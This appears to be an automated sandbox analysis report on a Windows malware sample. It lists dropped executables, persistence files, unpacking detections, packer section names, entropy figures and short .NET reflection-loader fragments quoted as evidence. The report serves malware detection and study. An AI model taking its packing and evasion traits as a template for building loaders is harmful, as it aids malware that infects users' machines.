                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeProcess created: C:\Users\user\Desktop\ZA3cYU28Yl.exe "C:\Users\user\Desktop\ZA3cYU28Yl.exe"
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9460.exe C:\Users\user\AppData\Local\Temp\9460.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A019.exe C:\Users\user\AppData\Local\Temp\A019.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9779.exe C:\Users\user\AppData\Local\Temp\9779.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\A881.exe C:\Users\user\AppData\Local\Temp\A881.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\B217.exe C:\Users\user\AppData\Local\Temp\B217.exe
                      Source: C:\Users\user\AppData\Roaming\rcvfbteProcess created: C:\Users\user\AppData\Roaming\rcvfbte C:\Users\user\AppData\Roaming\rcvfbte
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeProcess created: C:\Users\user\AppData\Local\Temp\A019.exe C:\Users\user\AppData\Local\Temp\A019.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 6608 -ip 6608
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 6608 -s 520
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess created: C:\Users\user\AppData\Local\Temp\B217.exe C:\Users\user\AppData\Local\Temp\B217.exe
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\9460.tmpJump to behavior
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00419905 SetLastError,GetConsoleCursorInfo,GetProfileStringA,WriteProfileSectionW,GetProfileStringW,GetLastError,GetSystemWow64DirectoryW,GetWindowsDirectoryW,GetCPInfoExA,GetDiskFreeSpaceExA,GetStartupInfoW,ReadConsoleOutputCharacterW,GlobalUnWire,GetProcessHeap,GetProcessHeap,WritePrivateProfileStringW,SetPriorityClass,
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4588:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:6868:64:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1244:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6608
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6748:120:WilError_01
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_01
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: 0.0
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: hijaduvinijebup
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: mocisacatenu
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: wapejan
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: wovag
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: cbH
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: Piruvora
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: gukafipa
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: mawecamaxe
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: Hiwejanoji
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: Pusazide
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCommand line argument: hukujid
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCommand line argument: cbH
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCommand line argument: cbH
                      Source: B217.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: B217.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 969F.exe.10.dr, Univesity_Grade_Calculator/Form1.csCryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 27.0.B217.exe.a90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 27.2.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: 27.2.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csCryptographic APIs: 'CreateDecryptor'
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\svchost.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeFile opened: C:\Windows\SysWOW64\msvcr100.dll
                      Source: ZA3cYU28Yl.exeStatic PE information: More than 200 imports for KERNEL32.dll
                      Source: ZA3cYU28Yl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: ZA3cYU28Yl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: ZA3cYU28Yl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: ZA3cYU28Yl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: ZA3cYU28Yl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: ZA3cYU28Yl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: ZA3cYU28Yl.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: msvcrt.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb source: WerFault.exe, 00000015.00000003.395354648.0000000004A9A000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395547115.0000000000A97000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: ucrtbase.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: msvcrt.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wrpcrt4.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb source: WerFault.exe, 00000015.00000003.397528255.0000000000A91000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395537078.0000000000A91000.00000004.00000001.sdmp
                      Source: Binary string: wrpcrt4.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: shcore.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: shlwapi.pdb) source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wgdi32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: advapi32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: fltLib.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: shell32.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: msvcr100.i386.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: msvcp_win.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: wimm32.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: wkernelbase.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: shlwapi.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wwin32u.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: $C:\sujabofu\kusaximenoki-xade\belowupo.pdbh source: A881.exe, 0000001A.00000000.401560008.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: fltLib.pdb; source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wntdll.pdb( source: WerFault.exe, 00000015.00000003.397528255.0000000000A91000.00000004.00000001.sdmp, WerFault.exe, 00000015.00000003.395537078.0000000000A91000.00000004.00000001.sdmp
                      Source: Binary string: profapi.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: dC:\mezakidujawu dukopigowoyiy56\feno_coje.pdbh source: ZA3cYU28Yl.exe, 00000001.00000000.277973193.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000001.00000002.282871844.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000003.00000000.280952997.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000000.366754687.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000002.372555425.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000F.00000000.370964910.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000000.383419511.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000002.395793668.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000014.00000000.392777524.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9460.exe, 00000010.00000000.377618773.0000000000413000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385010762.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000015.00000002.432733171.0000000000D60000.00000002.00020000.sdmp
                      Source: Binary string: wgdi32full.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: r*;\C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdbh source: 9779.exe, 00000016.00000000.394084565.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: sechost.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: profapi.pdbq source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wsspicli.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: C:\xazunilula6\leziwobamer-mugudarecemas_gure.pdb source: 9779.exe, 00000016.00000000.394084565.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: C:\sujabofu\kusaximenoki-xade\belowupo.pdb source: A881.exe, 0000001A.00000000.401560008.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: Kernel.Appcore.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: C:\mezakidujawu dukopigowoyiy56\feno_coje.pdb source: ZA3cYU28Yl.exe, ZA3cYU28Yl.exe, 00000001.00000000.277973193.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000001.00000002.282871844.0000000000401000.00000020.00020000.sdmp, ZA3cYU28Yl.exe, 00000003.00000000.280952997.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000000.366754687.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000E.00000002.372555425.0000000000401000.00000020.00020000.sdmp, rcvfbte, 0000000F.00000000.370964910.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000000.383419511.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000011.00000002.395793668.0000000000401000.00000020.00020000.sdmp, A019.exe, 00000014.00000000.392777524.0000000000401000.00000020.00020000.sdmp
                      Source: Binary string: cryptbase.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: powrprof.pdbk source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: sechost.pdbk source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: cfgmgr32.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: bcryptprimitives.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: Windows.Storage.pdb source: WerFault.exe, 00000015.00000003.402934493.0000000004E40000.00000004.00000040.sdmp
                      Source: Binary string: combase.pdb source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp
                      Source: Binary string: wkernel32.pdb( source: WerFault.exe, 00000015.00000003.395547115.0000000000A97000.00000004.00000001.sdmp
                      Source: Binary string: apphelp.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: wuser32.pdb source: WerFault.exe, 00000015.00000003.402925222.0000000004E71000.00000004.00000001.sdmp
                      Source: Binary string: <wJC:\vop\voyik\vugibecibimin23_hafi\marayu\gahexa.pdb source: 9460.exe, 00000010.00000000.377618773.0000000000413000.00000002.00020000.sdmp, 9460.exe, 00000010.00000000.385010762.0000000000413000.00000002.00020000.sdmp, WerFault.exe, 00000015.00000002.432733171.0000000000D60000.00000002.00020000.sdmp
                      Source: Binary string: cfgmgr32.pdb= source: WerFault.exe, 00000015.00000003.402944144.0000000004E47000.00000004.00000040.sdmp

                      Data Obfuscation:

                      barindex
                      Detected unpacking (overwrites its own PE header)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeUnpacked PE file: 22.2.9779.exe.400000.0.unpack
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeUnpacked PE file: 26.2.A881.exe.400000.0.unpack
                      Detected unpacking (changes PE section rights)Show sources
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeUnpacked PE file: 22.2.9779.exe.400000.0.unpack .text:ER;.data:W;.zic:W;.wuvuhus:W;.jufot:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeUnpacked PE file: 26.2.A881.exe.400000.0.unpack .text:ER;.data:W;.mekafe:W;.tuxu:W;.hawoz:W;.rsrc:R;.reloc:R; vs .text:ER;.rdata:R;.data:W;.reloc:R;
                      .NET source code contains potential unpackerShow sources
                      Source: 3657.exe.10.dr, CoreApi.cs.Net Code: Start System.Reflection.Assembly System.AppDomain::Load(System.Byte[])
                      Source: 969F.exe.10.dr, Univesity_Grade_Calculator/Form1.cs.Net Code: Form1_Load System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
                      .NET source code contains method to dynamically call methods (often used by packers)Show sources
                      Source: B217.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 27.0.B217.exe.a90000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 27.0.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 27.0.B217.exe.a90000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 27.2.B217.exe.a90000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 27.0.B217.exe.a90000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 42.0.B217.exe.1b0000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 42.0.B217.exe.1b0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: 42.0.B217.exe.1b0000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[] { typeof(IntPtr), typeof(Type) })
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_004092EC push esp; ret
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_00573634 push es; iretd
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00401880 push esi; iretd
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_2_00402E94 push es; iretd
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 3_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Roaming\rcvfbteCode function: 15_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_00412CA4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0047127E push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0047123C push edi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_0047735E push esp; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9460.exeCode function: 16_2_004753C8 pushfd ; retf
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 17_2_006C3634 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00401880 push esi; iretd
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_2_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\A019.exeCode function: 20_1_00402E94 push es; iretd
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_0041A66D push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_004139B0 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_0088D603 pushfd ; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00888A20 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00888988 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_008889B4 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_0088D5D1 pushfd ; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_008889F4 push ebx; retf
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00889F1B push ebx; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_00888978 push eax; ret
                      Source: C:\Users\user\AppData\Local\Temp\9779.exeCode function: 22_2_0088CB70 pushad ; ret
                      Source: C:\Users\user\AppData\Local\Temp\A881.exeCode function: 26_2_0043DF53 push esi; retn 0042h
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_00A98508 push 00000028h; retf 0000h
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_00A9764A push esp; ret
                      Source: C:\Users\user\AppData\Local\Temp\B217.exeCode function: 27_2_05284003 push esi; retf
                      Source: C:\Users\user\Desktop\ZA3cYU28Yl.exeCode function: 1_2_0042D560 LoadLibraryW,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,__encode_pointer,
                      Source: 3657.exe.10.drStatic PE information: 0x964C769C [Sat Nov 27 02:38:20 2049 UTC]
                      Source: ZA3cYU28Yl.exeStatic PE information: section name: .wumened
                      Source: ZA3cYU28Yl.exeStatic PE information: section name: .kilohe
                      Source: ZA3cYU28Yl.exeStatic PE information: section name: .putohox
                      Source: 2EE4.exe.10.drStatic PE information: section name: _RDATA
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name:
                      Source: 41A3.exe.10.drStatic PE information: section name: .28gybOo
                      Source: 41A3.exe.10.drStatic PE information: section name: .adata
                      Source: A019.exe.10.drStatic PE information: section name: .wumened
                      Source: A019.exe.10.drStatic PE information: section name: .kilohe
                      Source: A019.exe.10.drStatic PE information: section name: .putohox
                      Source: 9779.exe.10.drStatic PE information: section name: .zic
                      Source: 9779.exe.10.drStatic PE information: section name: .wuvuhus
                      Source: 9779.exe.10.drStatic PE information: section name: .jufot
                      Source: A881.exe.10.drStatic PE information: section name: .mekafe
                      Source: A881.exe.10.drStatic PE information: section name: .tuxu
                      Source: A881.exe.10.drStatic PE information: section name: .hawoz
                      Source: 50E7.exe.10.drStatic PE information: section name: .didata
                      Source: 72B9.exe.10.drStatic PE information: section name: _RDATA
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name:
                      Source: 7F9A.exe.10.drStatic PE information: section name: .2pZFPAB
                      Source: 7F9A.exe.10.drStatic PE information: section name: .adata
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name:
                      Source: 8ECE.exe.10.drStatic PE information: section name: .kujN2o2
                      Source: 8ECE.exe.10.drStatic PE information: section name: .adata
                      Source: rcvfbte.10.drStatic PE information: section name: .wumened
                      Source: rcvfbte.10.drStatic PE information: section name: .kilohe
                      Source: rcvfbte.10.drStatic PE information: section name: .putohox
                      Source: lnagngtg.exe.26.drStatic PE information: section name: .mekafe
                      Source: lnagngtg.exe.26.drStatic PE information: section name: .tuxu
                      Source: lnagngtg.exe.26.drStatic PE information: section name: .hawoz
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .didata
                      Source: 3657.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x1298c
                      Source: 41A3.exe.10.drStatic PE information: real checksum: 0x3721bb should be: 0x373654
                      Source: B217.exe.10.drStatic PE information: real checksum: 0x0 should be: 0x9011f
                      Source: 8ECE.exe.10.drStatic PE information: real checksum: 0x373823 should be: 0x3738f9
                      Source: 7F9A.exe.10.drStatic PE information: real checksum: 0x36d1e8 should be: 0x37985e
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.95926809019
                      Source: initial sampleStatic PE information: section name: entropy: 7.99714766582
                      Source: initial sampleStatic PE information: section name: entropy: 7.90784224501
                      Source: initial sampleStatic PE information: section name: entropy: 7.99361781473
                      Source: initial sampleStatic PE information: section name: entropy: 7.80912989946
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22348700263
                      Source: initial sampleStatic PE information: section name: .28gybOo entropy: 7.91849564721
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.95926809019
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.98113997622
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96210301798
                      Source: initial sampleStatic PE information: section name: .didata entropy: 7.99713235918
                      Source: initial sampleStatic PE information: section name: entropy: 7.99715965774
                      Source: initial sampleStatic PE information: section name: entropy: 7.90405352991
                      Source: initial sampleStatic PE information: section name: entropy: 7.99357874577
                      Source: initial sampleStatic PE information: section name: entropy: 7.7922746648
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.23071246858
                      Source: initial sampleStatic PE information: section name: .2pZFPAB entropy: 7.9174117718
                      Source: initial sampleStatic PE information: section name: entropy: 7.99715248044
                      Source: initial sampleStatic PE information: section name: entropy: 7.90789134233
                      Source: initial sampleStatic PE information: section name: entropy: 7.99431797903
                      Source: initial sampleStatic PE information: section name: entropy: 7.81839424264
                      Source: initial sampleStatic PE information: section name: .rsrc entropy: 7.22755578232
                      Source: initial sampleStatic PE information: section name: .kujN2o2 entropy: 7.91856580958
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.95926809019
                      Source: initial sampleStatic PE information: section name: .text entropy: 6.96210301798
                      Source: B217.exe.10.dr, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                      Source: B217.exe.10.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
